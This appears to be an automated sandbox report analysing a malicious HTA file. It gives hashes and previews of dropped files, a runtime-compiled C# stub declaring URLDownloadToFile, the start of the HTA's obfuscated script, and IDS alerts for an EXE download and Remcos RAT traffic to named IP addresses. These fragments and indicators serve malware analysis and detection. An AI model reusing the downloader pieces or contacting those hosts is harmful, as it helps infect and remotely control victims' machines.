                                                                            MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                            SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                            SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                            SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                            Malicious:false
                                                                            Preview:@...e.................................^..............@..........
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 16 17:54:40 2024, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1328
                                                                            Entropy (8bit):3.9955395160787517
                                                                            Encrypted:false
                                                                            SSDEEP:24:HSe9E2+fkxuXDfHywKEbsmfII+ycuZhNyakS6PNnqSqd:gFzpKPmg1ulya32qSK
                                                                            MD5:F6F2916DE97B9C95DEF9932A973646E4
                                                                            SHA1:CA3A336FF3EAB5F6712D272001760113EE4F8A8C
                                                                            SHA-256:F4BDD53EBBAF434C0A5B79D252832BB026421F90E83BC621912DEB1C096B1301
                                                                            SHA-512:B718BC3BA8F82094A1D20360F3A21415B87E4E00A097D620315D0B6570086E1979ADF7379E236216B249C4129856D5DFBCA2ED1BBF98BE9364B4549904969472
                                                                            Malicious:false
                                                                            Preview:L...`i`g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP................s......~....&............4.......C:\Users\user\AppData\Local\Temp\RESC255.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.e.a.h.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.110431696877216
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEak7Ynqq6PN5Dlq5J:+RI+ycuZhNyakS6PNnqX
                                                                            MD5:14731998021894BA7E8B051AC0269C98
                                                                            SHA1:FE2434A0EDD15CB30CE9500C0DB19DFEE469A71D
                                                                            SHA-256:F58483E4E1012062F88FBE20B4060414383DD952FBCC9ACB0DB7760CC7788D66
                                                                            SHA-512:0A5004C4E8AAE2BD57636E12CA05684007B08D5FA161573B78F2C0BCDA3E77E77447385E7D7741FC318FA12D85670EE28F10B54CC8D2767679F3EBEA5A470D92
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.e.a.h.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.x.p.e.a.h.v.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (379)
                                                                            Category:dropped
                                                                            Size (bytes):493
                                                                            Entropy (8bit):3.8361876809299056
                                                                            Encrypted:false
                                                                            SSDEEP:6:V/DsYLDS81zuO2XkmMGlhjQXReKJ8SRHy4HfPKkasYl6feKbB5RiQy:V/DTLDfuPXkKOXfHDy9IfHtOQy
                                                                            MD5:00DF4AE943D803CB15795B1FD55EAD94
                                                                            SHA1:FC1509B646D150CC4D1C2D92CF772BE4AF67716B
                                                                            SHA-256:E8D13D324B35FC23A6729CAA22125343BFEBB09476A9334E93E8C1804CE6314A
                                                                            SHA-512:E40826E83F25A3BE3FDF26C1D5A667D0EB40D53D3F0FE46F8CC395152CD1EB46B98E193FC3A3F06B6CEFADBED030D2A90A5575C1D235228D53D5F152D2E85796
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace NlOCs.{. public class iRDSu. {. [DllImport("urlmoN.dlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr KbuKoVjoaLe,string pYfI,string LkFGOOQrPHR,uint WsxOTFQEep,IntPtr AhXQ);.. }..}.
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.272729074822539
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fj3lPR0zxs7+AEszIwkn23fj3lPrn:p37Lvkmb6KRf4WZEif1
                                                                            MD5:7C3C6C43BD704F864742FAE473212C36
                                                                            SHA1:9072C79765023DD3F1018074D139710FABFB3168
                                                                            SHA-256:4E4857FF5EB61C2C0DE34733E813F83D895E93474D41B50BDDC2E9DA920DED3D
                                                                            SHA-512:2CD7CEEA26F38ADD5CF2D09BB3FD74A73322DFDE92775EE9B0FEDC849FC17E8EE8D91B87510FC5D563FE6A29F46E33FFD547B6F4B9E2C316AC470DAA3FB5BD45
                                                                            Malicious:true
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.0.cs"
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):2.8577112736187114
                                                                            Encrypted:false
                                                                            SSDEEP:24:etGSgpeYYLPl78OxUlkal/uPvobKYtkZf2qTyAFWI+ycuZhNyakS6PNnq:6vYwPlIOSWPvobkJ2q+91ulya32q
                                                                            MD5:6832164D07DC0FCDCEABC3581300E961
                                                                            SHA1:88995BF9C4428B26CDF3501882C161E326237B3B
                                                                            SHA-256:F599F514289D11EE18A699434495393E3AEE5D811D7F62D60548DB8F40AB2215
                                                                            SHA-512:872D06421FF08F43FF3CE6215FEA759EA44FAC22B9DEAAACC25D4B798B6CD2BFBA58AE631FF8C1EB5FB8321014706D623C55F1639CDF1BFBC09077241D07665B
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`i`g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,...................................................... :.....P ......L.........R.....^.....c.....o.....z...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.jx
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):867
                                                                            Entropy (8bit):5.3164567838097225
                                                                            Encrypted:false
                                                                            SSDEEP:24:KJBqd3ka6KRfJEifQKax5DqBVKVrdFAMBJTH:Cika6CJEuQK2DcVKdBJj
                                                                            MD5:80713E831E24461EBD87E885DE5FEF1A
                                                                            SHA1:A41BE9AF238945EAD20E0B63FF54AA88AB7C4EB3
                                                                            SHA-256:AB8C528531C65E6EA63721554F6ACE31383EA578D3D970DCC01D66C84216503A
                                                                            SHA-512:E9A50E31CE9172D18EE9F06852D337BA1AF39C9ECAD7168C668F5FFBD5832A1832E7C745500BBC7D697998F62F3039C6F84636F2B8CD18C8EB5F36E7DBC0418C
                                                                            Malicious:false
                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):540672
                                                                            Entropy (8bit):6.60558566420824
                                                                            Encrypted:false
                                                                            SSDEEP:6144:1oO3gcLssxNY5nm9zzeuQMdKNuCsXVkm4MrVGFlujcbDxnrTtF0xyOOOtwFt4rmk:1oQYsM5nm9nR81sFkTXwjcBrAbOOteQ
                                                                            MD5:A2D03C5333BFECCA62720CD6EE3A4DC4
                                                                            SHA1:CE4C380F2748F375904C17B38D4F93E294FEF4F6
                                                                            SHA-256:EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                                                                            SHA-512:5C9DB8BB415DA332C0ADC24519AE0410A65ABA932DE15A682CE57EFBC61B8B7D7E5E3548164909A5DA5BC6966C351528626655FDBB7C21F3B4FD1974406AE04C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                            Joe Sandbox View:
                                                                            • Filename: crreatedbestthingswithgreatattitudeneedforthat.hta, Detection: malicious
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G...........................`............`.......................Rich...................PE..L...a..e............................R.............@.................................t..........................................(....p..h=..................................................P8.......8..@............................................text.............................. ..`.data...........d..................@....rsrc...h=...p...>..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                            Category:dropped
                                                                            Size (bytes):1835008
                                                                            Entropy (8bit):4.465525083504039
                                                                            Encrypted:false
                                                                            SSDEEP:6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNNdwBCswSbL:6XD94+WlLZMM6YFH/+L
                                                                            MD5:AAF8FBAADCE18AFD434BA41E6C78C15A
                                                                            SHA1:0D8D36FEF7B48DA4650B461E4AD6B964871A5FD3
                                                                            SHA-256:44865EC247A321488D16764BEACEE8AAD0D7C75C84C50C5A46685AB80367AD69
                                                                            SHA-512:6853BC59AEC58D1570432A747F2DABC90BD2424BF33AC3C446CE0D61BFADBE7FEEA8276110D8C3B31535E79248EB8024F93C0926F0C92F387ECB0A80823A8F7A
                                                                            Malicious:false
                                                                            Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"....O..............................................................................................................................................................................................................................................................................................................................................SW..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            File type:HTML document, ASCII text, with very long lines (65451), with CRLF line terminators
                                                                            Entropy (8bit):2.6668302746742327
                                                                            TrID:
                                                                              File name:newthingswithgreatupdateiongivenbestthingswithme.hta
                                                                              File size:146'553 bytes
                                                                              MD5:fd6fc3abb81de5133fb2de54b937ca20
                                                                              SHA1:241f7fa153504078a9a9b07f966f3c4e862a9545
                                                                              SHA256:73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
                                                                              SHA512:5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516
                                                                              SSDEEP:768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl
                                                                              TLSH:7EE36F63C9DF9838E6BBBDBBE71C7B3B11436F4EE8898597069C49D00DD11867128B84
                                                                              File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by ufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-16T17:30:28.928530+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11192.3.179.16680192.168.2.449730TCP
                                                                              2024-12-16T17:30:29.310927+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21192.3.179.16680192.168.2.449730TCP
                                                                              2024-12-16T17:30:37.463478+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449731107.173.4.162560TCP
                                                                              2024-12-16T17:30:40.729168+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449732107.173.4.162560TCP
                                                                              2024-12-16T17:30:43.911956+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449734107.173.4.162560TCP
                                                                              2024-12-16T17:30:46.979534+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449737107.173.4.162560TCP
                                                                              2024-12-16T17:30:50.058328+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740107.173.4.162560TCP
                                                                              2024-12-16T17:30:53.199623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449742107.173.4.162560TCP
                                                                              2024-12-16T17:30:56.518752+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449743107.173.4.162560TCP
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP+Port (fused in extraction) | Protocol
2024-12-16T17:30:59.594117+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49744 | 107.173.4.162560 | TCP
2024-12-16T17:31:02.738356+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49745 | 107.173.4.162560 | TCP
2024-12-16T17:31:05.840521+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49746 | 107.173.4.162560 | TCP
2024-12-16T17:31:08.903925+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49747 | 107.173.4.162560 | TCP
2024-12-16T17:31:12.005673+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49748 | 107.173.4.162560 | TCP
2024-12-16T17:31:15.057924+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49749 | 107.173.4.162560 | TCP
2024-12-16T17:31:18.120444+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49750 | 107.173.4.162560 | TCP
2024-12-16T17:31:21.183831+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49752 | 107.173.4.162560 | TCP
2024-12-16T17:31:24.262126+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49758 | 107.173.4.162560 | TCP
2024-12-16T17:31:27.417659+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49765 | 107.173.4.162560 | TCP
2024-12-16T17:31:30.480124+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49776 | 107.173.4.162560 | TCP
2024-12-16T17:31:33.563539+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49782 | 107.173.4.162560 | TCP
2024-12-16T17:31:36.621978+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49792 | 107.173.4.162560 | TCP
2024-12-16T17:31:39.831861+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49799 | 107.173.4.162560 | TCP
2024-12-16T17:31:42.909917+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49804 | 107.173.4.162560 | TCP
2024-12-16T17:31:46.063526+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49814 | 107.173.4.162560 | TCP
2024-12-16T17:31:49.172233+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49820 | 107.173.4.162560 | TCP
2024-12-16T17:31:52.246851+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49827 | 107.173.4.162560 | TCP
2024-12-16T17:31:55.347908+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49837 | 107.173.4.162560 | TCP
2024-12-16T17:31:58.428007+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49843 | 107.173.4.162560 | TCP
2024-12-16T17:32:01.557935+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49852 | 107.173.4.162560 | TCP
2024-12-16T17:32:05.289148+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49860 | 107.173.4.162560 | TCP
2024-12-16T17:32:08.375879+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49868 | 107.173.4.162560 | TCP
2024-12-16T17:32:11.645186+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49877 | 107.173.4.162560 | TCP
2024-12-16T17:32:14.716900+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49884 | 107.173.4.162560 | TCP
2024-12-16T17:32:17.857163+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49894 | 107.173.4.162560 | TCP
2024-12-16T17:32:21.078162+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49899 | 107.173.4.162560 | TCP
2024-12-16T17:32:24.131784+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49906 | 107.173.4.162560 | TCP
2024-12-16T17:32:27.393382+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49915 | 107.173.4.162560 | TCP
2024-12-16T17:32:30.366328+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49922 | 107.173.4.162560 | TCP
2024-12-16T17:32:33.299389+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49929 | 107.173.4.162560 | TCP
2024-12-16T17:32:36.169190+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49938 | 107.173.4.162560 | TCP
2024-12-16T17:32:39.032418+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49945 | 107.173.4.162560 | TCP
2024-12-16T17:32:41.859982+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49951 | 107.173.4.162560 | TCP
2024-12-16T17:32:44.685978+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49959 | 107.173.4.162560 | TCP
2024-12-16T17:32:47.466166+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49968 | 107.173.4.162560 | TCP
2024-12-16T17:32:50.263798+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49974 | 107.173.4.162560 | TCP
2024-12-16T17:32:53.027684+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49980 | 107.173.4.162560 | TCP
2024-12-16T17:32:55.731756+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49987 | 107.173.4.162560 | TCP
2024-12-16T17:32:58.435921+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49993 | 107.173.4.162560 | TCP
2024-12-16T17:33:01.111052+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50003 | 107.173.4.162560 | TCP
2024-12-16T17:33:03.754623+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50009 | 107.173.4.162560 | TCP
2024-12-16T17:33:06.392061+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50015 | 107.173.4.162560 | TCP
2024-12-16T17:33:09.001423+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50022 | 107.173.4.162560 | TCP
2024-12-16T17:33:11.627020+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50028 | 107.173.4.162560 | TCP
2024-12-16T17:33:14.205806+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50038 | 107.173.4.162560 | TCP
2024-12-16T17:33:16.784252+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50044 | 107.173.4.162560 | TCP
2024-12-16T17:33:19.329978+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50049 | 107.173.4.162560 | TCP
2024-12-16T17:33:21.926481+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50055 | 107.173.4.162560 | TCP
2024-12-16T17:33:24.475070+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50059 | 107.173.4.162560 | TCP
2024-12-16T17:33:27.049050+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50060 | 107.173.4.162560 | TCP
2024-12-16T17:33:29.548833+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50061 | 107.173.4.162560 | TCP
2024-12-16T17:33:32.019962+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50062 | 107.173.4.162560 | TCP
2024-12-16T17:33:34.467071+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50063 | 107.173.4.162560 | TCP
2024-12-16T17:33:36.968098+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50064 | 107.173.4.162560 | TCP
2024-12-16T17:33:39.408042+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50065 | 107.173.4.162560 | TCP
2024-12-16T17:33:41.846513+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50066 | 107.173.4.162560 | TCP
2024-12-16T17:33:44.250391+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50067 | 107.173.4.162560 | TCP
2024-12-16T17:33:46.675082+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50068 | 107.173.4.162560 | TCP
2024-12-16T17:33:49.064098+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50069 | 107.173.4.162560 | TCP
2024-12-16T17:33:51.488115+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50070 | 107.173.4.162560 | TCP
2024-12-16T17:33:53.962241+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50071 | 107.173.4.162560 | TCP
2024-12-16T17:33:56.377519+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50072 | 107.173.4.162560 | TCP
2024-12-16T17:33:58.890768+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50073 | 107.173.4.162560 | TCP
2024-12-16T17:34:01.357874+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50074 | 107.173.4.162560 | TCP
2024-12-16T17:34:03.826995+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50075 | 107.173.4.162560 | TCP
2024-12-16T17:34:06.331131+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50076 | 107.173.4.162560 | TCP
2024-12-16T17:34:08.752658+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50077 | 107.173.4.162560 | TCP
2024-12-16T17:34:11.163417+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50078 | 107.173.4.162560 | TCP
2024-12-16T17:34:13.640104+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50079 | 107.173.4.162560 | TCP
2024-12-16T17:34:16.084200+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50080 | 107.173.4.162560 | TCP
2024-12-16T17:34:18.650734+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50081 | 107.173.4.162560 | TCP
2024-12-16T17:34:21.062809+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50082 | 107.173.4.162560 | TCP
2024-12-16T17:34:23.576702+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50083 | 107.173.4.162560 | TCP
